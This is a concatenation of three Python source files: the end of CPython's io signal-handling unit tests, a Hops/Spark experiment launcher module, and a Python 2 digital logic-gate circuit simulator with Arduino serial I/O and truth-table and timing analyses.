except OSError as e:
if e.errno != errno.EBADF:
raise
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
    @unittest.skipIf(sys.platform == "OpenVMS", "-= it hangs =-")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
launcher.py
|
"""
Simple experiment implementation
"""
from hops.experiment_impl.util import experiment_utils
from hops import devices, tensorboard, hdfs
import pydoop.hdfs
import threading
import time
import json
import os
import six
def _run(sc, map_fun, run_id, args_dict=None, local_logdir=False, name="no-name"):
"""
Args:
sc:
map_fun:
args_dict:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
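    # args_dict maps each argument name of map_fun to a list of values; entry i of every
    # list forms the arguments of execution i, so all lists must have equal length.
    # Hypothetical example: {'lr': [0.01, 0.1], 'dropout': [0.3, 0.5]} gives 2 executions.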
    if args_dict is None:
num_executions = 1
else:
arg_lists = list(args_dict.values())
currentLen = len(arg_lists[0])
for i in range(len(arg_lists)):
if currentLen != len(arg_lists[i]):
raise ValueError('Length of each function argument list must be equal')
num_executions = len(arg_lists[i])
sc.setJobGroup(os.environ['ML_ID'], "{} | Launcher running experiment".format(name))
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, args_dict, local_logdir))
print('Finished Experiment \n')
# For single run return .return if exists
    if args_dict is None:
path_to_return = experiment_utils._get_logdir(app_id, run_id) + '/.outputs.json'
if hdfs.exists(path_to_return):
return_json = hdfs.load(path_to_return)
return_dict = json.loads(return_json)
return experiment_utils._get_logdir(app_id, run_id), return_dict
else:
return experiment_utils._get_logdir(app_id, run_id), None
elif num_executions == 1:
arg_count = six.get_function_code(map_fun).co_argcount
arg_names = six.get_function_code(map_fun).co_varnames
argIndex = 0
param_string = ''
while arg_count > 0:
param_name = arg_names[argIndex]
param_val = args_dict[param_name][0]
param_string += str(param_name) + '=' + str(param_val) + '&'
arg_count -= 1
argIndex += 1
param_string = param_string[:-1]
path_to_return = experiment_utils._get_logdir(app_id, run_id) + '/' + param_string + '/.outputs.json'
if hdfs.exists(path_to_return):
return_json = hdfs.load(path_to_return)
return_dict = json.loads(return_json)
return experiment_utils._get_logdir(app_id, run_id), return_dict
else:
return experiment_utils._get_logdir(app_id, run_id), None
else:
return experiment_utils._get_logdir(app_id, run_id), None
# Helper that wraps map_fun so it accepts the iterator parameter Spark passes to foreachPartition
def _prepare_func(app_id, run_id, map_fun, args_dict, local_logdir):
"""
Args:
app_id:
run_id:
map_fun:
args_dict:
local_logdir:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
tb_hdfs_path = ''
hdfs_exec_logdir = experiment_utils._get_logdir(app_id, run_id)
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
try:
#Arguments
if args_dict:
param_string, params, args = experiment_utils.build_parameters(map_fun, executor_num, args_dict)
hdfs_exec_logdir, hdfs_appid_logdir = experiment_utils._create_experiment_subdirectories(app_id, run_id, param_string, 'grid_search', params=params)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task ' + param_string)
task_start = time.time()
retval = map_fun(*args)
task_end = time.time()
experiment_utils._handle_return_simple(retval, hdfs_exec_logdir, logfile)
time_str = 'Finished task ' + param_string + ' - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
else:
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_exec_logdir, executor_num, local_logdir=local_logdir)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task')
task_start = time.time()
retval = map_fun()
task_end = time.time()
experiment_utils._handle_return_simple(retval, hdfs_exec_logdir, logfile)
time_str = 'Finished task - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
|
simulator.py
|
import config as con
import gates as gt
import construct_circuit as cc
import read_code as rc
import plot_data as pd
import error_handle as eh
import arducom as ad
import subcircuit_definition as sd
import functional_node_sort as fns
import analysis_data as analyd
import time
import thread
import threading
import os
##########################################################################################################################
def stop_thread(thread):
thread.join()
con.circuit_simulation_flag=False
con.end_time=time.clock()
##########################################################################################################################
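# CLOCK_DATA layout, inferred from the indexing below: [0] clock node index, [1] start
# delay, [2] high duration, [3] low duration, [4] current level, [5] started flag.
# Durations are compared against time.clock() deltas, i.e. they are in seconds.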
def clocking():
con.current_time=time.clock()
if con.CLOCK_DATA!=None:
if con.CLOCK_DATA[5]==0:
if (con.current_time-con.last_time)>=con.CLOCK_DATA[1]:
con.CLOCK_DATA[5]=1
con.last_time=con.current_time
else:
if con.CLOCK_DATA[4]==0:
if (con.current_time-con.last_time)>=con.CLOCK_DATA[3]:
con.CLOCK_DATA[4]=1
con.NODE_DATA[con.CLOCK_DATA[0]][2]=con.CLOCK_DATA[4]
con.last_time=con.current_time
else:
if (con.current_time-con.last_time)>=con.CLOCK_DATA[2]:
con.CLOCK_DATA[4]=0
con.NODE_DATA[con.CLOCK_DATA[0]][2]=con.CLOCK_DATA[4]
con.last_time=con.current_time
###########################################################################################################################
def clock_flaging(a_time):
con.current_time=time.clock()
elapsed_time=con.current_time-con.start_time
if (elapsed_time*1000)>=a_time:
return True
else:
return False
###########################################################################################################################
def real_time_circuit_simulation(lock):
try:
while con.circuit_simulation_flag:
clocking()
lock.acquire()
simulator()
lock.release()
if con.PRINT_NODE_INDEX!=[]:
pd.real_time_print()
elif con.PLOT_NODE!=[]:
temp_data_plot=[]
temp_data_plot.append(con.current_time-con.start_time)
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
pd.animate_plot_nodes(temp_data_plot)
except:
con.circuit_simulation_flag=False
###########################################################################################################################
def circuit_simulation(lock):
try:
while con.circuit_simulation_flag:
lock.acquire()
simulator()
lock.release()
except:
con.circuit_simulation_flag=False
###########################################################################################################################
def arduino_python_serial_communication_in(lock):
try:
while con.serial_communication_flag:
ad.arduino2python(lock)
except:
exit()
###########################################################################################################################
def arduino_python_serial_communication_out(lock):
try:
while con.serial_communication_flag:
ad.python2arduino(lock)
except:
exit()
###########################################################################################################################
def input_thread(a_list):
raw_input()
a_list.append(True)
con.end_time=time.clock()
###########################################################################################################################
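# Evaluate a single gate: gate[0] is the gate type, the remaining entries are node
# indices with inputs first and the output last; the result is written into
# NODE_DATA[<output index>][2] and the updated NODE_DATA is returned.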
def gate_operate(gate,NODE_DATA):
if gate[0]=="BUFFER":
NODE_DATA[gate[2]][2]=gt.BUFFER(NODE_DATA[gate[1]][2])
elif gate[0]=="TRISTATE_BUFFER":
NODE_DATA[gate[3]][2]=gt.TRISTATE_BUFFER(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2],NODE_DATA[gate[3]][2])
elif gate[0]=="AND_2":
NODE_DATA[gate[3]][2]=gt.AND_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="OR_2":
NODE_DATA[gate[3]][2]=gt.OR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="NOT":
NODE_DATA[gate[2]][2]=gt.NOT(NODE_DATA[gate[1]][2])
elif gate[0]=="NAND_2":
NODE_DATA[gate[3]][2]=gt.NAND_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="NOR_2":
NODE_DATA[gate[3]][2]=gt.NOR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="XOR_2":
NODE_DATA[gate[3]][2]=gt.XOR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="XNOR_2":
NODE_DATA[gate[3]][2]=gt.XNOR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
return NODE_DATA
###########################################################################################################################
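# Build the full truth-table stimulus: for N input variables, return all 2**N binary
# combinations as lists of 0/1, left-padded with zeros to length N
# (e.g. N=2 -> [[0,0], [0,1], [1,0], [1,1]]).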
def input_values_generator(INPUT_VARIABLES_COUNT):
INPUT_DATA=[]
for count in range(2**INPUT_VARIABLES_COUNT):
binary=bin(count)
binary=list(binary)
binary=binary[2:]
for b in range(len(binary)):
binary[b]=eval(binary[b])
for b in range(INPUT_VARIABLES_COUNT-len(binary)):
binary.insert(0,0)
INPUT_DATA.append(binary)
return INPUT_DATA
###########################################################################################################################
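# One simulation pass: evaluate every gate in netlist order, force tri-state outputs
# whose enables are all 0 back to 0, and, when a board is attached, rebuild the
# data-direction mask (DDR_DATA) describing which board pins are currently driven.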
def simulator():
for gate in con.MAINCKT_DATA:
con.NODE_DATA=gate_operate(gate,con.NODE_DATA)
for tb_index in con.tristate_buffer_list:
set_op0_flag=1
tb_enable_list=tb_index[1:]
for tb_en_index in tb_enable_list:
if con.NODE_DATA[tb_en_index][2]==1:
set_op0_flag=0
break
if set_op0_flag==1:
con.NODE_DATA[tb_index[0]][2]=0
temp_connect_out_buff_data=0
if con.BOARD_INFO!=None and con.tristate_buffer_list!=[]:
for pin_index in con.BOARD_OUTPUT:
if pin_index[2]=='n.c.':
                temp_connect_out_buff_data=temp_connect_out_buff_data<<1
else:
temp_flag=True
for tb_en in pin_index[2]:
if con.NODE_DATA[tb_en][2]==1:
temp_flag=False
break
if temp_flag==True:
                    temp_connect_out_buff_data=(temp_connect_out_buff_data<<1) | 1
                else:
                    temp_connect_out_buff_data=temp_connect_out_buff_data<<1
con.DDR_DATA=con.ddr_DATA & (temp_connect_out_buff_data ^ 65535)
else:
con.DDR_DATA=con.ddr_DATA
def main():
###########################################################################################################################
con.initialize()
sd.def_subckt()
rc.scan_code(con.CODE_DATA)
cc.circuit_construct()
fns.functional_indexing()
###########################################################################################################################
analyd.display_start_data()
###########################################################################################################################
if con.BOARD_INFO!=None:
ad.initialize_arducom()
###########################################################################################################################
lock=threading.Lock()
circuit_simulation_thread=threading.Thread(target=circuit_simulation,args=(lock,))
real_time_circuit_simulation_thread=threading.Thread(target=real_time_circuit_simulation,args=(lock,))
arduino_python_serial_communication_in_thread=threading.Thread(target=arduino_python_serial_communication_in,args=(lock,))
arduino_python_serial_communication_out_thread=threading.Thread(target=arduino_python_serial_communication_out,args=(lock,))
clocking_thread=threading.Thread(target=clocking)
###########################################################################################################################
if con.BOARD_INFO!=None:
arduino_python_serial_communication_in_thread.start()
arduino_python_serial_communication_out_thread.start()
if con.scan_sampling_time<0.03:
con.scan_sampling_time=0.03
###########################################################################################################################
analyd.detdisplay_ANALYSIS_data()
analyd.start_mcktstp_sim()
###########################################################################################################################
if con.MAINCKT_SETUP_NODE_INDEX!=[]:
if con.ANALYSIS_DATA==None:
for i in con.PRINT_NODE:
if i !='time':
print i,"\t",
else:
print "ms.\t",
print ""
else:
mcktstp_file_data=""
for i in con.PRINTF_NODE:
if i !='time':
mcktstp_file_data=mcktstp_file_data+str(i)+"\t"
else:
mcktstp_file_data=mcktstp_file_data+"ms.\t"
con.ANALYSIS_DATA.write(mcktstp_file_data+"\n")
mcktstp_index=0
con.start_time=time.clock()
con.last_time=con.start_time
###########################################################################################################################
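    # Main-circuit stimulus loop: each SETUP_DATA row is applied either at the time (ms)
    # in its first column (when mcktstp_time_flag==1) or every scan_sampling_time seconds,
    # and the resulting node values are printed or written to the ANALYSIS_DATA file.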
while con.MAINCKT_SETUP_NODE_INDEX!=[] and con.SETUP_DATA!=[]:
if con.mcktstp_time_flag==1:
if clock_flaging(con.SETUP_DATA[mcktstp_index+1][0]):
mcktstp_index+=1
if mcktstp_index==(len(con.SETUP_DATA)-1):
break
else:
con.current_time=time.clock()
if (con.current_time-con.last_time)>=con.scan_sampling_time:
mcktstp_index+=1
con.last_time=con.current_time
if mcktstp_index==len(con.SETUP_DATA):
break
lock.acquire()
for input_index in range(len(con.MAINCKT_SETUP_NODE_INDEX)):
con.NODE_DATA[con.MAINCKT_SETUP_NODE_INDEX[input_index]][2]=con.SETUP_DATA[mcktstp_index][input_index+con.mcktstp_time_flag]
lock.release()
temp_data_print=[]
mcktstp_file_data=""
simulator()
if con.BOARD_INFO!=None:
time.sleep(con.serial_sync_time)
if con.ANALYSIS_DATA==None:
for mainckt_setup_index in con.PRINT_NODE_INDEX:
if mainckt_setup_index!='time':
temp_data_print.append(int(con.NODE_DATA[mainckt_setup_index][-1]))
else:
temp_data_print.append(round((con.current_time*1000),1))
else:
for mainckt_setup_index in con.PRINTF_NODE_INDEX:
if mainckt_setup_index!='time':
mcktstp_file_data=mcktstp_file_data+str((int(con.NODE_DATA[mainckt_setup_index][-1])))+"\t"
else:
mcktstp_file_data=mcktstp_file_data+str(round((con.current_time*1000),1))+"\t"
if con.ANALYSIS_DATA==None:
con.MAINCKT_PRINT_ARRAY.append(temp_data_print)
else:
con.ANALYSIS_DATA.write(mcktstp_file_data+"\n")
###########################################################################################################################
if con.PRINT_NODE!=[]:
for display_data in con.MAINCKT_PRINT_ARRAY:
for data in display_data:
print data,"\t",
print ""
###########################################################################################################################
analyd.start_sim()
###########################################################################################################################
if con.ANALYSIS=="TT_ANALYSIS":
con.MAXIMUM_SIMULATION_COUNT=1
if con.TRUTH_TABLE_INPUT_DATA_FILE==None:
con.INPUT_VARIABLES_VALUE=input_values_generator(con.INPUT_VARIABLES_COUNT)
con.start_time=time.clock()
###########################################################################################################################
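        # tt_time_flag==0 applies the truth-table rows back to back; otherwise the first
        # column of each row is the time (ms) at which that row becomes the input vector,
        # and the circuit is simulated continuously on a background thread meanwhile.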
if con.tt_time_flag==0:
###########################################################################################################################
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=''
for i in con.PRINTF_NODE:
if i != 'time':
time_file_data=time_file_data+str(i)+"\t"
else:
time_file_data=time_file_data+"ms.\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
if con.PRINT_NODE!=[]:
temp_data_print=[]
for i in con.PRINT_NODE:
if i != 'time':
temp_data_print.append(i)
else:
temp_data_print.append('ms.')
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
for tt_index in range(len(con.INPUT_VARIABLES_VALUE)):
for input_index in range(len(con.INPUT_NODE_INDEX)):
con.NODE_DATA[con.INPUT_NODE_INDEX[input_index]][2]=con.INPUT_VARIABLES_VALUE[tt_index][input_index]
simulator()
if con.BOARD_INFO!=None:
time.sleep(con.scan_sampling_time)
temp_data_print=[]
con.current_time=time.clock()
lock.acquire()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
temp_data_print.append(int(con.NODE_DATA[print_node_index][-1]))
else:
temp_data_print.append(round(((con.current_time-con.start_time)*1000),1))
lock.release()
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=""
lock.acquire()
for printf_node_index in con.PRINTF_NODE_INDEX:
if printf_node_index!='time':
time_file_data=time_file_data+str(int(con.NODE_DATA[printf_node_index][-1]))+"\t"
else:
time_file_data=time_file_data+str(round(((con.current_time-con.start_time)*1000),1))+"\t"
lock.release()
con.ANALYSIS_DATA.write(time_file_data+"\n")
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
con.end_time=time.clock()
###########################################################################################################################
else:
con.start_time=time.clock()
con.last_time=con.start_time
circuit_simulation_thread.start()
###########################################################################################################################
temp_data_print=[]
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=''
for i in con.PRINTF_NODE:
if i != 'time':
time_file_data=time_file_data+str(i)+"\t"
else:
time_file_data=time_file_data+"ms.\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
if con.PRINT_NODE!=[]:
temp_data_print=[]
for i in con.PRINT_NODE:
if i != 'time':
temp_data_print.append(i)
else:
temp_data_print.append('ms.')
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
tt_index=0
###########################################################################################################################
while con.circuit_simulation_flag:
if clock_flaging(con.INPUT_VARIABLES_VALUE[tt_index+1][0]):
tt_index+=1
if tt_index==(len(con.INPUT_VARIABLES_VALUE)-1):
con.end_time=time.clock()
con.circuit_simulation_flag=False
circuit_simulation_thread.join()
break
lock.acquire()
for input_index in range(len(con.INPUT_NODE_INDEX)):
con.NODE_DATA[con.INPUT_NODE_INDEX[input_index]][2]=con.INPUT_VARIABLES_VALUE[tt_index][input_index+con.tt_time_flag]
lock.release()
if con.BOARD_INFO!=None:
time.sleep(con.serial_sync_time)
###########################################################################################################################
temp_data_print=[]
temp_data_plot=[]
temp_data_plot.append(con.current_time-con.start_time)
lock.acquire()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
temp_data_print.append(int(con.NODE_DATA[print_node_index][-1]))
else:
temp_data_print.append(round(((con.current_time-con.start_time)*1000),1))
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
lock.release()
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=""
lock.acquire()
for printf_node_index in con.PRINTF_NODE_INDEX:
if printf_node_index!='time':
time_file_data=time_file_data+str(int(con.NODE_DATA[printf_node_index][-1]))+"\t"
else:
time_file_data=time_file_data+str(round(((con.current_time-con.start_time)*1000),1))+"\t"
lock.release()
con.ANALYSIS_DATA.write(time_file_data+"\n")
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
con.PLOT_DATA.append(temp_data_plot)
###########################################################################################################################
if con.PRINT_NODE!=[]:
for display_data in con.TIME_ANALYSIS_DATA_ARRAY:
for data in display_data:
print data,"\t",
print ""
if con.PLOT_NODE!=[] and con.tt_time_flag!=0:
pd.plot_nodes()
###########################################################################################################################
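    # OT_ANALYSIS: one-time analysis. Scan-node voltages are read interactively once,
    # the circuit is solved a fixed number of times (MAXIMUM_SIMULATION_COUNT), and the
    # resulting node values are printed and optionally written to the analysis file.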
elif con.ANALYSIS=="OT_ANALYSIS":
con.MAXIMUM_SIMULATION_COUNT=5
if con.SCAN_NODE!=[]:
print "\n-Scanning Node Voltages-\n"
for scan_node_index in con.SCAN_NODE_INDEX:
temp_store=raw_input(str(con.NODE_DATA[scan_node_index][0])+" : ")
if con.is_number(temp_store):
temp_store=eval(temp_store)
if temp_store!=0 and temp_store!=1:
eh.display_error(0,0,-1,temp_store)
else:
con.NODE_DATA[scan_node_index][2]=temp_store
else:
eh.display_error(con.ANALYSIS,0,-2,temp_store)
con.start_time=time.clock()
if con.PRINT_NODE!=[]:
print "\n-Printing Node Voltages-\n"
for i in con.PRINT_NODE:
if i != 'time':
print i,'\t',
else:
print 'ms.','\t',
print ""
for simulation_counter in range(con.MAXIMUM_SIMULATION_COUNT):
time.sleep(con.scan_sampling_time)
simulator()
con.end_time=time.clock()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index != 'time':
print int(con.NODE_DATA[print_node_index][-1]),'\t',
else:
print round(((time.clock()-con.start_time)*1000),1),'\t',
print "\n"
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
temp_data_print=""
for i in con.PRINTF_NODE:
temp_data_print=temp_data_print+str(i)+'\t'
temp_data_print=temp_data_print+'\n'
for printf_node_index in con.PRINTF_NODE_INDEX:
temp_data_print=temp_data_print+str(int(con.NODE_DATA[printf_node_index][-1]))+'\t'
con.ANALYSIS_DATA.write(temp_data_print+'\n')
###########################################################################################################################
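    # RT_ANALYSIS: real-time analysis. A background thread simulates the circuit
    # continuously while the main loop keeps prompting for scan-node values; an empty
    # or invalid entry (or the thread stopping on its own) ends the run.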
elif con.ANALYSIS=="RT_ANALYSIS":
con.start_time=time.clock()
con.last_time=con.start_time
con.MAXIMUM_SIMULATION_COUNT=1
if con.PRINT_NODE!=[]:
pd.real_time_print_setup()
elif con.PLOT_NODE!=[]:
pd.animate_plot_nodes_setup()
real_time_circuit_simulation_thread.start()
###########################################################################################################################
scan_cycle_counter=1
while con.circuit_simulation_flag:
if con.SCAN_NODE!=[]:
print "\n-Scanning Node Voltages-\n"
print "# Scan cycle :",scan_cycle_counter
for scan_node_index in con.SCAN_NODE_INDEX:
temp_store=raw_input(str(con.NODE_DATA[scan_node_index][0])+" : ")
if not(con.circuit_simulation_flag):
eh.display_error(0,0,-6,0)
elif con.is_number(temp_store):
temp_store=eval(temp_store)
if temp_store!=0 and temp_store!=1:
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
eh.display_error(0,0,-1,temp_store)
else:
con.NODE_DATA[scan_node_index][2]=temp_store
else:
if temp_store=='':
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
break
else:
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
eh.display_error(con.ANALYSIS,0,-2,temp_store)
else:
_=raw_input()
if not(con.circuit_simulation_flag):
eh.display_error(0,0,-6,0)
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
break
scan_cycle_counter+=1
time.sleep(con.scan_sampling_time)
###########################################################################################################################
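    # TIME_ANALYSIS: clocked simulation in the main thread. Without a
    # TOTAL_SIMULATION_TIME it free-runs (updating prints/plots) until the user presses
    # Enter via input_thread(); otherwise it steps clocking()+simulator() until the
    # elapsed time reaches TOTAL_SIMULATION_TIME, then prints and plots the collected data.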
elif con.ANALYSIS=="TIME_ANALYSIS":
con.MAXIMUM_SIMULATION_COUNT=1
con.start_time=time.clock()
con.last_time=con.start_time
con.current_time=con.start_time
###########################################################################################################################
if con.TOTAL_SIMULATION_TIME==None:
if con.PLOT_NODE!=[]:
pd.animate_plot_nodes_setup()
a_list=[]
thread.start_new_thread(input_thread,(a_list,))
###########################################################################################################################
while not a_list:
lock.acquire()
clocking()
simulator()
lock.release()
if con.PLOT_NODE!=[]:
temp_data_plot=[]
temp_data_plot.append(con.current_time-con.start_time)
lock.acquire()
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
lock.release()
pd.animate_plot_nodes(temp_data_plot)
if con.PRINT_NODE!=[]:
lock.acquire()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
print int(con.NODE_DATA[print_node_index][-1]),"\t",
else:
print round(((con.current_time-con.start_time)*1000),1),"\t",
lock.release()
print ""
###########################################################################################################################
else:
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=''
for i in con.PRINTF_NODE:
if i != 'time':
time_file_data=time_file_data+str(i)+"\t"
else:
time_file_data=time_file_data+"ms.\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
if con.PRINT_NODE!=[]:
temp_data_print=[]
for i in con.PRINT_NODE:
if i != 'time':
temp_data_print.append(i)
else:
temp_data_print.append('ms.')
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
while True:
clocking()
simulator()
temp_data_print=[]
temp_data_plot=[]
if con.BOARD_INFO!=None:
time.sleep(con.serial_sync_time)
temp_data_plot.append(con.current_time-con.start_time)
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
temp_data_print.append(int(con.NODE_DATA[print_node_index][-1]))
else:
temp_data_print.append(round(((con.current_time-con.start_time)*1000),1))
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=""
for printf_node_index in con.PRINTF_NODE_INDEX:
if printf_node_index!='time':
